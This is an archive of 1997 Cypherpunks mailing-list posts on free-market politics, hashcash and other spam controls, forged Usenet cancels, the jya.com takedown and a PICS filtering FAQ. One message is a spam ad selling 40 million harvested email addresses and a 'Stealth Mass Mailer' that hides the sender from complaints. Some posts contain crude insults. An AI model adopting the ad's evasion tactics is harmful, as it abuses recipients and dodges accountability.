 with "remove" in the Subject or the Message section of the reply mail and
 your name will be removed from our database.

     To be globally removed from all lists go to   IEMMC.








From aba at dcs.ex.ac.uk  Sun Aug  3 03:42:54 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 3 Aug 1997 18:42:54 +0800
Subject: socialism = facism (was Re: non-censorous spam control)
In-Reply-To: 
Message-ID: <199708031002.LAA00626@server.test.net>




David Formosa  writes:
> On Sat, 2 Aug 1997, Steve Schear wrote:
> > I can't fuly agree. In Europe, both communism and fascism started from the
> > socialists (in fact, the fascist were called National Socialists)
> 
> The fascists called themselves Socialists for the same reson that the
> main pro logging group calls themselfs _The Forest Protection Socity_ as a
> returorical techneek to sucker peaple.

Socialism tends to lead to a fascist society.

> > and both accept the "... idea of a political party which embraces all 
> > activities of the individual from the cradle to the grave, which claims
> > to guide his views on everything, and which delights in making all
> > problems questions of party...," F.A. Hayek, The Road to Surfdom.

That's a reasonable expose' of the similarities.

> Replace political party with free market and you get the econmic
> reationalisum/thatureisum that has chocked socity.  The freandly
> socilisum that both the GNU mannifesto and most of the net works on
> has no such totalitarian tendencies.

The free market is much closer to the freedom of the net than you
might imagine.

eg. Socialism says that the state will steal from by force (guns,
imprisonment, etc follow quickly if you resist the theft) to give to
others who `need'.  Needs are unbounded.  How do you measure `need'?
By who has the most expensive lobyists, who can afford to pay the
highest bribes to politicians?  By who is the laziest and has allowed
their personal affairs to slip into the most disgraceful state.

In a free market economy such `needs' are met by charity.  People give
of their own free will, and give to charitable organisations that they
view as the most efficient at handling the causes they individually
think worthy.

If people don't want to give to this charitable cause, well then it
isn't worth supporting, to them.  If you have to take their charity
and gun point, it isn't charity, it's theft.

Socialism is based on theft.  So is Fascism.  It's forced labour, or
at least forced theft of assetts.

`Social contract' foo.  What social contract did I sign with the
crooks milking the political system?

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



I like it when spam is sent to the cpunks list because it makes the list
less accessible to lamers and wanna-be censors while not really
hurting its value to people who are familiar with configurable/
scriptable mail agents.



(Heck, I've considered 99% of cpunks traffic to be about the
same flavor as spam on my palate for years, so I'm already
comfortable with using heavy filtering as a matter of course.)



In other news, I'm going to  HIP  
and I'm thinking I should have a t-shirt made to piss off the
self-righteous socialist anti-spam activists.  My favorite 
slogan so far is "I may disagree with every spam you send, but
I will defend to the death your right to spam it. --Voltaire".
I consider this to be a powerful meme to broadcast at those
low-tech lawmongers, but it isn't sufficiently.. um.. offensive.
Any suggestions from the peanut gallery?


Of course I have to include my e-mail address on the shirt so
that those who are offended by my advocacy of absolute freedom
of speech can try to mailbomb me.



Over,

Zooko






From nobody at REPLAY.COM  Sun Aug  3 05:06:28 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 3 Aug 1997 20:06:28 +0800
Subject: tcs_gateway2.treas.gov (IRS Harrassment of Cypherpunks List?)
Message-ID: <199708031153.NAA04031@basement.replay.com>



After failing to find in the list archives previous posts from the
treas.gov address I was surprised to come across an example in a book
about the cypherpunks that was sent to the list some months ago.
Although I seem to recall this post as being authentic I am unable to
confirm this since my browser doesn't seem to be getting along with the
search engines for some reason or another. Can anyone confirm that the
message below is an authentic message that was sent to the list at the
time stated and with the same message ID? The reason I ask is that I
have found and corelated messages from the same server which indicate
that if the message came to the list with the message ID below then it
was indeed composed and initially sent the day before the article quoted
actually appeared in the newspaper.
If someone could confirm that the following message appeared on the list
with the same header as indicated below I would appreciate it.
(There are some other strange discrepancies I have found in Jim Bells
case too but I will refrain from commenting until I have had a chance to
confirm them.)

The message as portrayed in the book is as follows:
Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id
RAA03183 for
cypherpunks-unedited-outgoing; Wed, 2 Apr 1997 17:40:11 -0800 (PST)
Received: from tcs_gateway2.treas.gov (tcs-gateway2.treas.gov
[204.151.246.2]) by toad.com (8.7.5/8.7.3) with
SMTP id RAA03178 for ; Wed, 2 Apr 1997 17:40:04
-0800 (PST) 

From: IRSNWPR at net.insp.irs.gov
Date: Tue, 1 Apr 1997 15:18:46 -0500
Message-Id: <199704012018.PAA00555 at net.insp.irs.gov> 

To: Interested_Parties at net.insp.irs.gov
Subject: Something of interest... 

Sender: owner-cypherpunks at toad.com

The Oregonian, Wednesday, April 2, 1997 

20 armed federal agents raid home in Vancouver 

By John Painter Jr. of The Oregonian staff

VANCOUVER, Wash. - About 20 armed agents from at least three federal 
agencies in four states raided a Vancouver home Tuesday, apparently 
looking for evidence of a plot to kill government officials. 
....






From jya at pipeline.com  Sun Aug  3 05:17:47 1997
From: jya at pipeline.com (John Young)
Date: Sun, 3 Aug 1997 20:17:47 +0800
Subject: CIA Report on UFOs
Message-ID: <1.5.4.32.19970803115839.00694808@pop.pipeline.com>



The New York Times reports today on a declassified
CIA report on UFOs which discloses that over half
of the public sightings in the 1950s and '60s were lied 
about by the US Government to protect dark secret spy 
planes and programs, primarily those of the U-2 and 
SR-71. "The admission raised questions about other 
Federal cover-ups involving U.F.O.s."

The CIA report is at:

   http://www.odci.gov/csi/studies/97unclas/ufo.html

For those who wish to avoid the CIA Web site, we put a copy at:

   http://jyx.com/ciaufo.htm

The NYT Web site:

   http://www.nytimes.com

In you cannot access it, see the story at:

   http://jyx.com/ufonews.htm







From aba at dcs.ex.ac.uk  Sun Aug  3 05:33:31 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 3 Aug 1997 20:33:31 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <199708030302.XAA08565@cti06.citenet.net>
Message-ID: <199708031129.MAA00973@server.test.net>




jf_avon at citenet.net writes:
> On  3 Aug 97 at 2:34, Adam Back wrote:
> > Eg. Say I spam you via an anonymous remailer.  So now who are you
> > going to sue?
> >
> > Spammers use remailers already.
> > 
> > So your suggest has dire consequences for remailers.
> 
> What you would sue is the entity that is advertized in the 
> message, not the ISP (or remailer)  of course.  If you get harassing 
> mail through the paper mail, would you sue the postal service?

Here's the sequence of events as I see it:

 1. spammer spams you with adverisement for phone sex line
 2. you try to sue phone sex line company
 3. phone sex company denies all knowledge
 4. government says all email must be authenticated 
 5. government issues internet drivers license
 6. anonymous remailers work around authentication requirement
 7. government outlaws remailers

See any flaws in that logical and undesirable sequence of events?

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



At 01:56 97/08/03 -0600, Toto wrote:

>   It is clearly up to Joichi Ito to decide how he can best work toward
> cypherpunk goals under his system of government, but he would do well
> to listen to those on the list who have seen more than a few crusaders
> sink into the swill when they make the mistake of talking to the piggies
> too close to the trough.
>   A good sign that you have not yet been co-opted is if you still take
> that "extra" briefcase to the meetings, just in case.
> {"I've got to run out to my car for a moment with my briefcase, but I
> will be leaving my _other_ briefcase here." }
> 
> TruthMonger

Point well taken. I understand that it is easy to get misdirected
when you are "dancing with the devil"... Currently, as one of the primary
supporters of privacy and free access to cryptography in Japan, I have much
more
to lose and very little to gain from being "co-opted." by "the bad guys" (who
aren't looking out for the interests of the people).  In addition, although
the Japanese Self Defense Force may be militaristic (they are the military
so they probably are pretty militaristic), Japan does not have the
equivalent of the NSA. It really is in Japanese national security interests
to consider minimizing risk by distributing it since they obviously do not
have the ability to control it in the way that the US does. Anyone who
has been following the statements by the Japanese at the OECD should
note that Japan has alway lagged behind in supporting government control
of crypto. In addition (although this article is very seldom sited in actual
cases) the Japanese constitution provides for privacy of communications
for citizens. Also, most of the crypto technology is held in private
companies.

Really, what I am try to do is two things:

1) Make sure that Japan makes the right decision about crypto policy so
that they do no stifle commercial development of crypto or put at risk
national and individual security/privacy by implementing a weak system because
of political pressure or domestic surveilance requirements.

2) Make sure that Japan does not repeat the US "Hacker Crackdown" and
more recent Australian crackdowns which I think can cause a rift between
hackers and society. Right now I think the risk of weak security from
the point of view of IWar and just plain network failure is much more
important
than cracking down on hackers/crackers. I'm trying to head off such
"crackdown"
movements by trying to put threats and risks into perspective at the National
Security level and take the focus away from the activities of hackers who
I think can help improve security and lower risks in the long term.

As for Tim's message... I keep worrying (when I am in Japan) that I'm too
radical, so it's nice to hear from someone who is really hardcore to put
a wimp like me in my place. ;-P

I guess I still believe in trying to redirect the process of government before
"dropping out"... I'm not making it any easier for the "bad guys" giving them
my opinion and I can alway "drop out" when I think no one's listening
anymore...

Anyway, I'm going to stop writing now before all of the government people
reading this list decide to put me in their kill file. Then no one will be
listening
to me. ;-P


- Joi

P.S. I wrote an article in the Daily Yomiuri about a year ago that outlines
where I am coming from. Please take a look if you are interested. The
Daily Yomiuri is a national Japanese newspaper.


--
Finger jito at nsm.eccosys.com or jito at garage.co.jp for PGP Key
Fingerprint for RSA PGP Key ID 0x0EE23A2D
0D3A 7AAA 3DA8 E7B3  3AF1 C6FA B7ED D834
Fingerprint for DSS/Diffie-Hellman PGP Key ID 0x2D9461F1
58F3 CA9A EFB8 EB9D DF18  6B16 E48D AF2A 2D94 61F1
Home Page: http://domino.garage.co.jp/jito/joihome.nsf
To subscribe to my personal mailing list send mailto:friends-subscribe at ito.com




From adejoode at replay.com  Sun Aug  3 06:21:57 1997
From: adejoode at replay.com (Alex de Joode)
Date: Sun, 3 Aug 1997 21:21:57 +0800
Subject: spam is good for you
Message-ID: <199708031314.PAA13935@basement.replay.com>



Zooko Journeyman sez:

[..]
: In other news, I'm going to  HIP  
: and I'm thinking I should have a t-shirt made to piss off the
: self-righteous socialist anti-spam activists.  My favorite 
: slogan so far is "I may disagree with every spam you send, but
: I will defend to the death your right to spam it. --Voltaire".

Hehe, bring me such a T-shirt *g*

: I consider this to be a powerful meme to broadcast at those
: low-tech lawmongers, but it isn't sufficiently.. um.. offensive.
: Any suggestions from the peanut gallery?

--
 -aj-






From jya at pipeline.com  Sun Aug  3 06:54:14 1997
From: jya at pipeline.com (John Young)
Date: Sun, 3 Aug 1997 21:54:14 +0800
Subject: Banished JYA
Message-ID: <1.5.4.32.19970803133307.006e49b4@pop.pipeline.com>



From: http://jyx.com/index.htm

JYX

3 August 1997

This site, JYX.COM, was set up on July 26, 1997 to substitute for 
JYA.COM which vanished on July 24, 1997, and thereby denied access 
to the site's architectural and public services. For a week technical 
and sales personnel of the ISP for JYA, AOL/PrimeHost, could not 
explain the disappearance.

On August 1, 1997, AOL/PrimeHost representative Steven Graham 
stated that JYA.COM had been "intentionally pulled" for undisclosed 
reasons. Mr. Graham's telephone: (703) 265-4464.
 
Reinstitution of JYA's architectural and public services should occur 
shortly, either by restart of JYA.COM with PrimeHost, or via another 
ISP. In the event that AOL/PrimeHost pulls JYX as well, announcement 
of alternative hosting and reasons for the change will be made on 
several mail lists:

    
    
   
   
    
    
    
    

   and other lists and news groups as appropriate. 

This site is hosted by PrimeHost, which provided excellent service 
for JYA.COM for a year -- until now with this mysterious vanishing 
action.

------------------------------------------------------------------

                       Vanished JYA.COM

Denied Services                     Denied Files (80MB)

Architectural 

   Natsios Young Architect � �      http://jya.com/nya.htm
   John Young Architect             http://jya.com/jya.htm

Public / Urban Deadline

   Cryptography Archives            http://jya.com/crypto.htm
                                    http://jya.com/cryptomb.htm

   Architectural Archives           http://jya.com/arch.htm

------------------------------------------------------------------

For now offering only: Cryptox.htm







From aba at dcs.ex.ac.uk  Sun Aug  3 06:56:21 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 3 Aug 1997 21:56:21 +0800
Subject: http://jya.eternity/? (was Re: JYA Axed)
In-Reply-To: <1.5.4.32.19970802003043.006cb0a8@pop.pipeline.com>
Message-ID: <199708031339.OAA02898@server.test.net>




John Young  writes:
> The ISP for jya.com, PrimeHost, an AOL subisidiary, has axed
> the site.
> 
> [...]
> 
> Finally, a Boss was reached who said the site was "intentionally pulled." 
> He claimed that it was "not a serious problem, so don't be alarmed," 
> and sang cheerily about "some files" without elaboration.
> 
> Maybe more next week, and we pray it turns out to be hysterically
> alarming and not merely a pissed Intel Prop owner seeking pay.

If/when you do figure out what files it was that upset them, perhaps
we can put them in the distributed eternity www-based data haven.

Then tell them to go censor:

	http://jya.eternity/

(Should be fun to watch them try to "take down" a web document that is
scattered across millions of USENET news spools.  If any particular
eternity server operator gets hassled, the attention will cause a
feeding frenzy of new eternity servers springing up, much like the
attempt at censoring Radikal, only the documents will still be sitting
there in the document store, and there won't even be a glitch in
access.)

> JYX.com is still up, thanks to PrimeHost's autosub. Ten files there
> -- so far.

Current eternity servers:

	http://www.replay.com/aba/eternity/
	http://www.zipcon.net/~enoch/

(Thanks to the person who suggested in email the idea of mirroring
whatever it was primehost are trying to censor on jya.com).

[jya: do you still have all materials that were on jya.com?]

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: <199708031328.OAA02875@server.test.net>




sar  writes:
> At 06:32 AM 8/3/97 +1000, ? the Platypus {aka David Formosa} wrote:
> 
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >On Sat, 2 Aug 1997, Adam Back wrote:
> >
> >> Next we choose a threshold say 1000 posts per day.  Seems hard to
> >> imagine anyone generating manually over 1000 emails per day.  That's
> >> more than 1 per minute for a 10 hour day.
>
> Take bugtraq which has over 12,000 subscribers. Each post to bugtraq would
> send out 12,000 emails so it would cost aleph one 1200$ per post to his
> list. I dont think anyone would want to run a mailing list under these
> sorts of conditions.

The way such pay for email systems as I see them would interface with
your existing email system is that you would have a list of addresses
which you would be happy to receive email from for free.

Clearly a the list address for a list you subscribed to is an address
you would put in your "receive email without postage" list.

Mail from email addresses not on this list would be expected to
include a valid 0c postage stamp.  If they don't include the postage
the mail gets bounced together with a nag about installing the system,
and possibly a manual way for them to send you the email in spite of
the system

(Note most spammers use non-replyable email addresses, because they
don't want you to know their ISPs address, because their ISP will yank
their account as soon as they figure out what they're up to.)

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: <3.0.2.32.19970803102828.0076fa60@panix.com>



-----BEGIN PGP SIGNED MESSAGE-----

At 09:29 AM 8/2/97 -0700, Kent Crispin wrote:

>In more general terms: A "free market" fundamentally grants more
>control to those with more money.  

In a free society, the "poor" have more money (collectively) than the rich 
and outbid them for resources all the time.  Were this not so, communities of 
the "poor" would never increase in size and yet they do.  

It is also much easier for the poor to get money in a free society than for 
the powerless to get power in the sort of societies you favor.

I can teach a poor person in America today the simple ways to triple or 
quadruple his income.  I could not teach a resident of France or Germany or 
Japan a simple way to triple or quadruple his "influence" on his government 
and indeed a tripling of such influence would give him much less than a 
tripling of income.

DCF
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM+SVioVO4r4sgSPhAQGyDQP/dw4k0gI0clP6GbIVkFuTS/Whzfk7DHBV
uVtmQtUdNWbKq6SE2uPseLM09wc90qW55T6/B79RefvZr8sHP5UjS+1plC4sYekl
S0p5G1Gpw5sQKlngPctD1ORB/H6w2fE7/U+nnYWj+CAIDAptFp1A+sFIdyuSMGh8
i13liebFXuY=
=9d/g
-----END PGP SIGNATURE-----






From paul at fatmans.demon.co.uk  Sun Aug  3 07:56:56 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Sun, 3 Aug 1997 22:56:56 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: <199707312017.QAA05673@jafar.issl.atl.hp.com>
Message-ID: 




> > I agree.  If charging for mail would eliminate spam, then I should not
> > be getting the mailboxfull of physical junk mail I receive every
> > morning.  Postage benefits the MAIL CARRIER, not the recipient, and it
> > is in the best interests of the mail carrier to carry MORE mail, not
> > less.  So, e-postage will almost certainly cause more spam, not less. 

Hashcash is a more elegant and simple solution to UCE: most UCE is sent 
by small companies looking for a cheap way to get big exposure, they 
aren`t going to have the hardware to generate partial hash collisions for 
every address they want to mail, it would be prohibitively expensive for 
them to buy fast hardware to generate the collisions. Of course large 
companies who can afford to buy, or already have, mainframes will be able 
to send UCE, but most large companies are smart enough to realise that 
with the response rate gained from UCE, the reputation capital lost 
through sending it, and the valuable mainframe time used to generate the 
hashcash, it all adds up to a big shit sandwich.

Adam Back:   I haven`t read the hashcash paper/description for a while, 
can you give us some figures on how much processor time is required to 
generate hashcash for a 10,000 recipient spam, for n recipients?

Sudden and very exciting idea:

What if we could find a way to make the amount of hashcash required grow 
exponentially with the number of recipients? Of course the spammer could 
then find the optimum number of recipients and divide the list of 
addresses to be spammed into blocks of that size but that is a waste of 
sendmail time, also a waste of bandwidth and the overall time would 
probably still be prohibitively high.

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"

 






From frissell at panix.com  Sun Aug  3 08:01:27 1997
From: frissell at panix.com (frissell at panix.com)
Date: Sun, 3 Aug 1997 23:01:27 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <199708030302.XAA08565@cti06.citenet.net>
Message-ID: <3.0.2.32.19970803105321.039744cc@panix.com>



-----BEGIN PGP SIGNED MESSAGE-----

At 12:29 PM 8/3/97 +0100, Adam Back wrote:

> 5. government issues internet drivers license

Lacks authority.  Would have to figure out some way to get IETF to adopt its 
model, get software written, get enough hosts to adopt new software.

Rough.

Because after all those steps are taken, I can still sell anonymous accounts 
with virtually no risk of effective punishment.

DCF
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM+SbYIVO4r4sgSPhAQHuKgQAl/K2ZEu7bgUzRzRQfn2r5zbaz6hl7SkP
E3vNnGZ1sYIVpX8yloKQ4d/q3K6+ZydouR6W8eaz5MYvz629clRX6gDUKio7QN6Q
6mVi5W79EsU1Jdx+MNQysT19mPgdC/To9Lm3kq/LJiSJYTyXr2qkXmHIwj72oT2k
xYLL3CsAlws=
=tpUt
-----END PGP SIGNATURE-----






From paul at fatmans.demon.co.uk  Sun Aug  3 08:12:20 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Sun, 3 Aug 1997 23:12:20 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: 
Message-ID: 




> > > Not even forgeries in my name?  Not even out of the control spews from
> > > fidonet?
> > 
> > Correct.
> 
> Ok so if a mailing list gateway @bwalk.dm.com pumps thousands of broken
> posts into usenet you don't wish them to be removed from usenet?

That would be for Dimitri to decide for himself, and not for some 
cocksucker to take a unilateral decision on. Of course disabling cancels 
on all news-servers would mean such a freak article couldn`t be 
cancelled, even by it`s author, but that is better than having the cabal 
removing genuine articles because they don`t like the content.

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"







From paul at fatmans.demon.co.uk  Sun Aug  3 08:15:33 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Sun, 3 Aug 1997 23:15:33 +0800
Subject: Entrust Technologies's Solo - free download
In-Reply-To: <199707311958.MAA25081@kachina.jetcafe.org>
Message-ID: 




> My point of focus is freedom. Deleting others' messages is not
> justifiable for -any- reason, IMO. If you have a problem with what
> is sent, you should take it up with the source of the transmission.
> The carriers of that transmission cannot care about the content and
> still profess to be "free" in any way.

To give another perspective I see it this way:

Forging cancels for articles is just another form of speech, there is no 
crime in forging a cancel.

Accepting cancels as a newsadmin is no crime as it is private equipment 
and you can censor what the hell you want on your own news servers.

This is not to say either of these actions is to be condoned, merely that 
cancel-forgers are only exercising their right to free speech. 

Of course Chris lewis and all the other cancel-forgers are cocksuckers, 
and newsadmins who accept cancels are fools, but hey, there are fools and 
cocksuckers in every walk of life. Don`t like it? find and ISP that 
doesn`t accept cancels, most clued-up newsadmins just set the s/w to
ignore them.

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"







From owner-cypherpunks  Sun Aug  3 23:43:12 1997
From: owner-cypherpunks (owner-cypherpunks)
Date: Sun, 3 Aug 1997 23:43:12 -0700 (PDT)
Subject: Boost Your Sales With 40 Million New Prospects!
Message-ID: <199702161035.GAA08056@bizproplus.com>



To be removed from our email list, send a blank email to 
      remmee at answerme.com
We will also send you the URLs of two sites where you can go to have your 
name removed from hundreds of mailing lists!             
======================================================================

       The BEST Deal On Email Addresses Is Right Here!

You can find email lists all over the place. If you buy from the wrong
source, you will end up paying too much and recieving all flames and no
orders.
                      Not if you buy your list here!

Our email lists are compiled from a number of different sources. Each list
we sell is checked against our extensive remove list to reduce the number
of flames you recieve. In addition, we make our lists available at very
reasonable prices.

Just look at what our competition is charging for their lists:

                        10,000               $50.00
                         20,000              $100.00
                         30,000              $150.00
                         40,000              $200.00
                         50,000              $250.00
                         60,000              $300.00
                         70,000              $350.00
                         80,000              $400.00
                         90,000              $450.00
                        100,000              $500.00

                        These prices are OUTRAGEOUS!

Because we believe that everyone should have access to email lists, we are
offering our lists for the low, low price of $99 per million!
That's right! Only $99 gets you a list of 1,000,000 prospects to email your
ad to! 
                 UPDATE******************************UPDATE
As of Monday, July 14 we will be offering our complete email list for sale.
The list consists of 40 million email addresses gleaned from a variety of 
domains. By purchasing the entire list, you can save BIG! The addresses will 
be shipped on CD ROM in plain text files. 

NO UNZIPPING!!
Because the files are on CD-ROM, they do not have to be zipped in order
save space. 

NO PASSWORDS!!
Why should you waste your time looking up codes to unzip your address files
when you could be making money?
   --You Shouldn't!
That is why our CD will contain no password protection or zipped files. They
are truly ready to be mailed.

This list of 40 million prospects can be yours for the amazingly low price
of only $349.95.  

These addresses will be checked against our extensive remove
list to reduce the chance of you being flamed. Of course, there is no sure
fire guarantee against flames, but this will definitely help.

**No one can flame you if they don't know your email address. Only give
your email address to your customers. Not only does this reduce flames, it
also protects your internet account from termination.

                     How do I protect my email address?
1st of all, send your email with the Stealth Mass Mailer. This program will
protect your email address while sending your mail at speeds of up to
250,000 messages per hour (28.8 connection).
2nd, collect your inquiries and remove requests via AutoResponders . Using
AutoResponders, you don't even have to read the flames. Just move them to
your remove list and forget about them!

Read about the Stealth by sending an email to stealth44 at answerme.com

***********SPECIAL!!!**********
If you order within 7 days, we will give you a fully functional 10 day 
demo of the Stealth Mass Mailer to mail your ad with.

                                ORDER FORM:

Please print out this order form and then fill in the blanks......
   If you have any questions, please do not hesitate to call us at 504-767-6400

___Please send me 40 million email addresses for a total price of $349.95

___I am ordering within 7 days. Please include my free demo copy of the 
   most powerful bulk email software available -- Stealth Mass Mailer.

YOUR NAME____________________________________________

COMPANY NAME_________________________________________

YOUR POSITION_________________________________________

STREET ADDRESS________________________________________

CITY, STATE, ZIP______________________________________

PHONE NUMBERS_________________________________________

FAX NUMBERS___________________________________________

EMAIL ADDRESSES_______________________________________

We accept Checks, Money Orders and Visa, MasterCard or American Express by
mailor Credit Cards by fax. All checks will be held until cleared. For
fastest service use credit card or money order.

I agree to pay Mitchell Enterprises an additional $27 fee if my check is
returned for insufficient or uncollectable funds.

SIGNATURE: X_________________________________DATE:__________________

Please send all order forms and check, money order or credit card
authorization to:

Mitchell Enterprises
P. O. Box 80742
Baton Rouge, LA 70898

************************************************************
OR:
Fax Your Credit Card Authorization to:
504-767-6400
Visa____MasterCard____American Express____

Account #

Expiration Date

Address (as it appears on the card)

Zip (as it appears or the card)

Signature__________________________

*************************************************************
OR:
Fax or Your Check
Tape your check here and fax to 504-767-6400

*************************************************************
************************************************************
For info on Floodgate bulk email manager send an email to 
       flood at answerme.com

For info on Stealth Mass Mailer send an email to
       stealth44 at answerme.com

For info on starting your own internet business write 
       buskit at answerme.com
       mitinfo at answerme.com







From adejoode at replay.com  Sun Aug  3 09:02:48 1997
From: adejoode at replay.com (Alex de Joode)
Date: Mon, 4 Aug 1997 00:02:48 +0800
Subject: jya.com
Message-ID: <199708031551.RAA29954@basement.replay.com>




It seems that replay.com has a partial mirror of jya.com last update was
March 14th, so any docs uploaded after that date on jya.com are not
available.

URL: http://www.replay.com/mirror/jya.com

Enjoy.
-Alex






From travel23 at juno.com  Sun Aug  3 09:06:58 1997
From: travel23 at juno.com (The Traveler)
Date: Mon, 4 Aug 1997 00:06:58 +0800
Subject: Info on House members
Message-ID: <19970803.115119.3990.0.travel23@juno.com>



    WASHINGTON (AP) - Civic-minded Web surfers can review reams of
information about the House - from members' financial disclosure
statements to historical information and archives - courtesy of a new
resource center that launched a site Wednesday on the Internet.
      ``This creates a whole new world,'' said House Speaker Newt
Gingrich,  R-Ga., who helped dedicate the Legislative Resource Center in
a converted storage room beneath the rotunda of the Cannon House Office
Building.
      It combines the functions of several previously separate offices,
including  the House Library, the Office of the House Historian and the
House Document Room, to provide one-stop shopping for information about
the House of Representatives.
      Visitors can also conduct research in person at the office.
      The Internet address is http://clerkweb.house.gov.


--------------
"Sometimes you're the bug, sometimes you're the windshield."






From declan at well.com  Sun Aug  3 10:21:08 1997
From: declan at well.com (Declan McCullagh)
Date: Mon, 4 Aug 1997 01:21:08 +0800
Subject: PICS and intellectual freedom FAQ
Message-ID: 





---------- Forwarded message ----------
Date: Sun, 3 Aug 1997 10:04:04 -0700 (PDT)
From: Declan McCullagh 
To: fight-censorship-announce at vorlon.mit.edu
Subject: PICS and intellectual freedom FAQ

[If you care about the debate over self-labeling your web pages -- not to
mention email and Usenet posts -- read this FAQ on PICS. Thanks to Paul
for putting this together. --Declan]


---------- Forwarded message ----------
Date: Sun, 27 Jul 1997 07:36:52 -0400
From: Paul Resnick 
To: declan at well.com
Cc: lessig at pobox.com
Subject: PICS and Intellectual Freedom FAQ

7/27/97

Declan,

Given the renewed debate about the intellectual freedom implications of
rating and filtering generally, and PICS in particular, your readers may
find my FAQ on the subject enlightening. It introduces a number of useful
distinctions that seem to be missing from some recent discussion (rating
vs. filtering; self-rating vs. third-party rating; local vs. central
setting of filtering rules). There are some legitimate intellectual freedom
concerns with both rating and filtering, but it's important to get beyond
sweeping generalizations.

The URL is http://www.si.umich.edu/~presnick/pics/intfree/FAQ.htm

Paul Resnick
Associate Professor
University of Michigan
School of Information
chair, PICS Interest Group, World Wide Web Consortium

P.S. Please send comments about the FAQ to pics-ask at w3.org. Since I'll be
out of email contact for the next week, however, you should not expect an
immediate response.

---------------

Date: Mon, 28 Jul 97 15:06:10 -0400
From: Larry Lessig 
To: presnick at umich.edu, declan at well.com
Subject: Re: PICS and Intellectual Freedom FAQ

Hello Declan:

The FAQ is excellent - honest and clear, and it would help move the 
debate along well. As a strong opponent of some aspects of PICS, I hope 
you get a chance to run this.

Let me know if you get to Cambridge, 

-----------------

[I took this from http://www.si.umich.edu/~presnick/pics/intfree/FAQ.htm
-- check out that URL for links and graphics. --Declan]


                 PICS, Censorship, & Intellectual Freedom FAQ
                                       
   Paul Resnick (comments to pics-ask at w3.org)
   
   Draft version 1.12 last revised June 26, 1997
   
                                   Abstract
                                       
   The published articles describing PICS (Communications of the ACM,
   Scientific American) have focused on individual controls over the
   materials that are received on a computer. While those articles also
   mention the possibility of more centralized controls (e.g., by
   employers or governments), they describe only briefly the technical
   details and the intellectual freedom implications of such centralized
   controls. The civil liberties community has raised some alarms about
   those intellectual freedom implications. The goals for this Frequently
   Asked Questions (FAQ) document are to:
     * Clarify some technical questions about individual and centralized
       content controls based on PICS.
     * Argue that the net impact of PICS will be to shift government
       policies away from centralized controls and toward individual
       controls, although this impact may be visible only at the margins.
     * Describe how the World Wide Web Consortium (W3C) presents PICS in
       the public policy arena.
       
                                  Background
                                       
   In 1995, policies were proposed in several countries, including the
   USA, to restrict the distribution of certain kinds of material over
   the Internet. In many but not all cases, protection of children was
   the stated goal for such policies (see, for example, CIEC: Citizens
   Internet Empowerment Coalition).
   
   The focus on restricting inappropriate materials at their source is
   not well suited to the international nature of the Internet, where an
   information source may be in a different legal jurisdiction than the
   recipient. Moreover, materials may be legal and appropriate for some
   recipients but not others, so that any decision about whether to block
   at the source will be incorrect for some audiences.
   
   PICS, the Platform for Internet Content Selection, is a set of
   technical specifications that facilitate recipient-centered controls
   on Internet content, rather than sender-centered controls. The
   following diagram illustrates recipient-centered controls:
   
   [INLINE]
   
   Filtering software sits between a child (or any Internet user) and the
   available content. It allows access to some materials, and blocks
   access to other materials. Some filtering software directly analyzes
   content, typically looking for particular keywords. This FAQ, however,
   does not deal with that kind of software; it deals, instead, with
   filtering software that decides what to allow and what to block based
   on two information sources.
     * The first source is a set of descriptive labels that are
       associated with the materials. Those labels may be provided by
       information publishers who describe their own work, or may be
       provided by independent reviewers. A single document may have
       several labels associated with it.
     * The second information source the filter uses is a set of
       filtering rules, which say what kinds of labels to pay attention
       to, and what particular values in the labels indicate acceptable
       or unacceptable materials.
       
   PICS was not the first technology based on the idea of
   recipient-centered controls. For example, SurfWatch was already on the
   market in the summer of 1995 when PICS development began. It is based
